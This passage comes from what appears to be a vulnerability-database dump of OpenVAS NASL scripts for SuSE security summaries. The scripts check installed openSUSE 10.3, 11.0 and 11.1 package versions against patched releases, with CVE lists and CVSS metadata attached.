NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.31~4.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~8.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mailman\", rpm:\"mailman~2.1.11~8.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~28.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-Bootloader\", rpm:\"perl-Bootloader~0.4.81.1~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"plotutils\", rpm:\"plotutils~2.5~197.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pure-ftpd\", rpm:\"pure-ftpd~1.0.21~182.32.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p17~10.36.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"tsclient\", rpm:\"tsclient~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"tsclient-devel\", rpm:\"tsclient-devel~2.0.2~2.29.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xrdp\", rpm:\"xrdp~0.4.1~16.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-bootloader\", rpm:\"yast2-bootloader~2.17.50~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network\", rpm:\"yast2-network~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"yast2-network-devel-doc\", rpm:\"yast2-network-devel-doc~2.17.66~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.9.1~27.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~115.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils-gtk\", rpm:\"avahi-utils-gtk~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.2~39.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~119.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr\", rpm:\"libattr~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libattr-devel\", rpm:\"libattr-devel~2.4.43~2.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-client3\", rpm:\"libavahi-client3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-common3\", rpm:\"libavahi-common3~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-core5\", rpm:\"libavahi-core5~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif 
((res = isrpmvuln(pkg:\"libavahi-devel\", rpm:\"libavahi-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib-devel\", rpm:\"libavahi-glib-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-glib1\", rpm:\"libavahi-glib1~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject-devel\", rpm:\"libavahi-gobject-devel~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-gobject0\", rpm:\"libavahi-gobject0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libavahi-ui0\", rpm:\"libavahi-ui0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdns_sd\", rpm:\"libdns_sd~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libhowl0\", rpm:\"libhowl0~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", rpm:\"libnasl~2.2.10~59.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng3\", rpm:\"libpng3~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng12-0\", rpm:\"libpng12-0~1.2.26~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-debug\", rpm:\"nouveau-kmp-debug~0.10.1.20081112_2.6.25.18_0.2~0.3\", 
rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-default\", rpm:\"nouveau-kmp-default~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-pae\", rpm:\"nouveau-kmp-pae~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nouveau-kmp-xen\", rpm:\"nouveau-kmp-xen~0.10.1.20081112_2.6.25.18_0.2~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.8~14.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8g~47.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"python-avahi\", rpm:\"python-avahi~0.6.22~68.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p15~13.4\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~76.2\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau\", rpm:\"xorg-x11-driver-video-nouveau~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"xorg-x11-driver-video-nouveau-3d\", rpm:\"xorg-x11-driver-video-nouveau-3d~0.10.1.20081112~0.3\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) 
{\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.7~37.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~77.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl\", rpm:\"avahi-compat-howl~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder\", rpm:\"avahi-compat-mDNSResponder~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-devel\", rpm:\"avahi-devel~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-glib\", rpm:\"avahi-glib~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-python\", rpm:\"avahi-python~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt3\", rpm:\"avahi-qt3~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-qt4\", 
rpm:\"avahi-qt4~0.6.20~40.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.4.1.P1~12.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~75.5\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bigsmp\", rpm:\"kernel-bigsmp~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenpae\", rpm:\"kernel-xenpae~2.6.22.19~0.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libnasl\", 
rpm:\"libnasl~2.2.10~15.2\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpng-devel\", rpm:\"libpng-devel~1.2.18~15.6\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-certs\", rpm:\"openssl-certs~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8e~45.7\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"sudo\", rpm:\"sudo~1.6.9p2~23.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"syslog-ng\", rpm:\"syslog-ng~1.6.12~33.4\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0125", "CVE-2008-2383", "CVE-2008-3197", "CVE-2008-5902", "CVE-2008-1924", "CVE-2009-0034", "CVE-2009-0135", "CVE-2008-5907", "CVE-2008-5432", "CVE-2008-2960", "CVE-2008-5824", "CVE-2008-4326", "CVE-2009-0136", "CVE-2008-5904", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-5903", "CVE-2008-4309", "CVE-2009-0126", "CVE-2008-4096", "CVE-2008-5081", "CVE-2008-5621"], "description": "The remote host is missing updates announced in\nadvisory 
SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2018-04-06T00:00:00", "published": "2009-02-02T00:00:00", "id": "OPENVAS:136141256231063304", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063304", "type": "openvas", "title": "SuSE Security Summary SUSE-SR:2009:003", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_003.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:003\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:003. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. 
Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63304\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-02 23:28:24 +0100 (Mon, 02 Feb 2009)\");\n script_cve_id(\"CVE-2008-3197\", \"CVE-2008-5081\", \"CVE-2008-5432\", \"CVE-2008-1149\", \"CVE-2008-5824\", \"CVE-2008-5903\", \"CVE-2008-5902\", \"CVE-2008-5907\", \"CVE-2008-5904\", \"CVE-2008-1567\", \"CVE-2009-0125\", \"CVE-2009-0126\", \"CVE-2008-4326\", \"CVE-2008-4309\", \"CVE-2008-2960\", \"CVE-2008-5621\", \"CVE-2008-2383\", \"CVE-2008-1924\", \"CVE-2009-0034\", \"CVE-2009-0136\", \"CVE-2008-4096\", \"CVE-2009-0135\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:003\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"amarok\", rpm:\"amarok~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-lang\", rpm:\"amarok-lang~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-libvisual\", rpm:\"amarok-libvisual~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-xine\", rpm:\"amarok-xine~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"amarok-yauap\", rpm:\"amarok-yauap~1.4.10~26.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"attr\", rpm:\"attr~2.4.43~2.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~140.18.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"autofs\", rpm:\"autofs~5.0.3~82.28.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi\", rpm:\"avahi~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-howl-devel\", rpm:\"avahi-compat-howl-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-compat-mDNSResponder-devel\", rpm:\"avahi-compat-mDNSResponder-devel~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"avahi-utils\", rpm:\"avahi-utils~0.6.23~9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager\", rpm:\"backup-manager~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"backup-manager-lang\", rpm:\"backup-manager-lang~0.1.0~13.12.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-doc\", rpm:\"bind-doc~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.5.0P2~18.5.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero\", rpm:\"brasero~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-doc\", rpm:\"brasero-doc~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"brasero-lang\", rpm:\"brasero-lang~0.8.3~1.18.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~145.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash\", rpm:\"crash~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"crash-sial\", rpm:\"crash-sial~4.0.7.4~8.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-main-menu\", rpm:\"gnome-main-menu~0.9.11~22.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = 